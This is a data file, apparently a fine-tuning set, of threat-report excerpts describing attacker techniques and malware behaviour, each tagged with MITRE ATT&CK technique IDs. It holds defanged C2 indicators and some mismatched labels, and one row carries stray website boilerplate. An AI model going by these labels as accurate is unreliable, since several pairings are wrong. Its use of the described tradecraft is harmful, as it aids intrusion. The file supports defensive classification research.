| 917 | Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 918 | Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\Windows\Debug and C:\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification'] | fine_tune |
| 919 | After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration | ['T1560.001 - Archive Collected Data: Archive via Utility'] | fine_tune |
| 920 | Distributing the ransomware using spear-phishing and weaponized documents - Bat-files downloading payloads from Pastebin and inject them into a process on the operating system - Compromising RDP and usage of script files and password cracking tools to distribute over the victim’s network - Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware | ['T1055 - Process Injection'] | fine_tune |
| 921 | Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity | ['T1095 - Non-Application Layer Protocol'] | fine_tune |
| 922 | The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report | ['T1204.001 - Malicious Link'] | fine_tune |
| 923 | Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data | ['T1572 - Protocol Tunneling'] | fine_tune |
| 924 | The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 925 | In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees | ['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs'] | fine_tune |
| 926 | It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp://zeplin.atwebpages.com/inter.php and exfiltrates the ipconfig output gathered from the machine | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 927 | We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed | ['T1082 - System Information Discovery'] | fine_tune |
| 928 | The use of large size files to avoid detection by security solutions with hardcoded size limits for ‘efficiency’. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling | ['T1027.001 - Obfuscated Files or Information: Binary Padding'] | fine_tune |
| 929 | In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1 | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 930 | The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed | ['T1204.001 - Malicious Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 931 | Aria-body starts with gathering data on the victim’s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com | ['T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery'] | fine_tune |
| 932 | yty”, the name we use for the framework, from the PDB path string. A “bot id” consisting of computer name, user name, and volume serial number separated by dashes | ['T1082 - System Information Discovery'] | fine_tune |
| 933 | Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe. Next, it creates the service and runs it | ['T1012 - Query Registry', 'T1569.002 - System Services: Service Execution'] | fine_tune |
| 934 | The wiper could be configured to use a file to overwrite the files on the disk using the ‘F’ configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named ‘GRANT’, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5 | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 935 | This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the exfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn’t encode the stolen data or store the data in sessionStorage before the exfiltration | ['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol'] | fine_tune |
| 936 | The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 937 | After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 938 | If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic | ['T1029 - Scheduled Transfer'] | fine_tune |
| 939 | In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority | ['T1082 - System Information Discovery', 'T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 940 | m": mode: net or local. local - encrypt local drives only and ignore network shares. h": path to a file that contains specific hosts (names and IPs) to enumerate for shares. s": IP address that the initial register message will be sent to | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 941 | FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it "FINcoding. These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 942 | The kill_unwanted function gets a list of running processes, compares each process with a encrypted list of “unwanted” programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings, to ascertain the value of the “unwanted” programs | ['T1057 - Process Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 943 | Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details Of The Attacks . Our examination of the acquired samples shows hackers generally use two main methods of “Sending Fake SMS” and “Sending Fake Emails” to execute their attacks. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email . Another method used in this phishing campaign is sending fake emails with deceptive titles like “Merry Christmas, and sending note/book/photo and others”, which are usually sent by previously hacked emails. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email’s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of fake email after sending the initial email to the target . Redirect Chain . Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten’s phishing campaign and that this campaign has significantly intensified in recent days | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 944 | The payload is a 32-bit executable file that is used to encrypt files on the victim’s system to extort a ransom | ['T1083 - File and Directory Discovery'] | fine_tune |
| 945 | SpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times | ['T1053.003 - Scheduled Task/Job: Cron'] | fine_tune |
| 946 | In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 947 | To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, “oc_clear_mem” deletes the string memory right after it retrieves the process address | ['T1106 - Native API'] | fine_tune |
| 948 | The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002 | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 949 | They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools | ['T1021.004 - Remote Services: SSH'] | fine_tune |
| 950 | Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system | ['T1110.002 - Brute Force: Password Cracking'] | fine_tune |
| 951 | The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The “AJWrDz.exe” executable path is written to the registry Run key “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” to achieve persistency | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 952 | KillDisk’s infection chain . How is it dropped in the system. This KillDisk variant looks like it is intentionally dropped by another process/attacker. The new KillDisk variant’s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn’t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine. Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Accept Cancel Continue Processing the data, please give it a few seconds | ['T1134 - Access Token Manipulation'] | fine_tune |
| 953 | Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about "Operation Bitter Biscuit" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors | ['T1082 - System Information Discovery'] | fine_tune |
| 954 | NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk | ['T1552.001 - Unsecured Credentials: Credentials In Files'] | fine_tune |
| 955 | The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 956 | The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011 | ['T1095 - Non-Application Layer Protocol'] | fine_tune |
| 957 | We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information | ['T1102.001 - Dead Drop Resolver'] | fine_tune |
| 958 | When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 959 | Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased | ['T1012 - Query Registry'] | fine_tune |
| 960 | SchTasks.exe performs operations similar to those in Scheduled Tasks in Control Panel. You can use either tool to create, delete, configure, or display scheduled tasks. The user must be a member of the Administrators group on the computer that the command affects. To verify that a scheduled task ran or to find out why a scheduled task did not run, see the Task Scheduler service transaction log, Systemroot\SchedLgU.txt. This log records attempted runs initiated by all tools that use the service, including Scheduled Tasks and SchTasks.exe. On rare occasions, task files become corrupted. Corrupted tasks do not run. When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message: ERROR: The data is invalid. You cannot recover corrupted tasks. To restore the task scheduling features of the system, use SchTasks.exe or Scheduled Tasks to delete the tasks from the system and reschedule them | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 961 | The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 962 | SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 963 | The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system | ['T1016 - System Network Configuration Discovery', 'T1570 - Lateral Tool Transfer'] | fine_tune |
| 964 | Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 965 | The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 966 | This script is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate). The same can be found in Pony 1.9 code | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 967 | Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file | ['T1204.002 - User Execution: Malicious File', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1564.004 - Hide Artifacts: NTFS File Attributes'] | fine_tune |
| 968 | An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them | ['T1553.002 - Code Signing'] | fine_tune |
| 969 | In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 970 | The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 971 | Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g | ['T1036.004 - Masquerading: Masquerade Task or Service', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.004 - Masquerading: Masquerade Task or Service'] | fine_tune |
| 972 | The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020 | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 973 | The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 974 | It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 975 | The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda | ['T1588.002 - Tool', 'T1027 - Obfuscated Files or Information', 'T1046 - Network Service Discovery'] | fine_tune |
| 976 | It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019 | ['T1071.004 - Application Layer Protocol: DNS'] | fine_tune |
| 977 | Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites | ['T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 978 | This is used to maintain access to a Meterpreter session. It is saved to C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8 | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 979 | REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 980 | It will then jump to code that decrypts the Lokibot executable using decryption keys from the configuration structure. The first two layers are decrypted using `DecryptionKeyA` and `DecryptionKeyB`, and reverses all the data. After that, the final layer is decrypted using the same decryption method used to decrypt resource data at the start of the third stage.The DLL contains multiple ways to execute a PE file. The shellcode will create a suspended process using the third parameter as a command line command and injects Lokibot into it using process hollowing | ['T1055.012 - Process Injection: Process Hollowing'] | fine_tune |
| 981 | DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories | ['T1082 - System Information Discovery'] | fine_tune |
| 982 | Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point | ['T1609 - Kubernetes Exec Into Container'] | fine_tune |
| 983 | 1) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients | ['T1552.001 - Unsecured Credentials: Credentials In Files'] | fine_tune |
| 984 | Collect information about each disk, including directory and file lists, disk names, total space, and remaining space | ['T1082 - System Information Discovery'] | fine_tune |
| 985 | For the first time, the ROKRAT sample used during the "North Korean Human Rights" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample | ['T1555.004 - Credentials from Password Stores: Windows Credential Manager'] | fine_tune |
| 986 | This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 987 | Cobalt Strike appears to be one of BRONZE PRESIDENT's preferred remote access tools. During one intrusion, the threat actors installed it on over 70% of accessible hosts. The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable. BRONZE PRESIDENT installs PlugX using DLL side-loading. In June and August 2019, BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures. RCSession — This basic RAT is installed via DLL side-loading, and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions. RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process. RCSession connects to its C2 server via a custom protocol, can remotely execute commands, and can launch additional tools. CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool, suggesting it may be exclusively used by BRONZE PRESIDENT. Nbtscan being used via RCSession to scan an internal IP range | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 988 | Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel | ['T1027.003 - Steganography'] | fine_tune |
| 989 | After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 990 | CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware | ['T1486 - Data Encrypted for Impact'] | fine_tune |
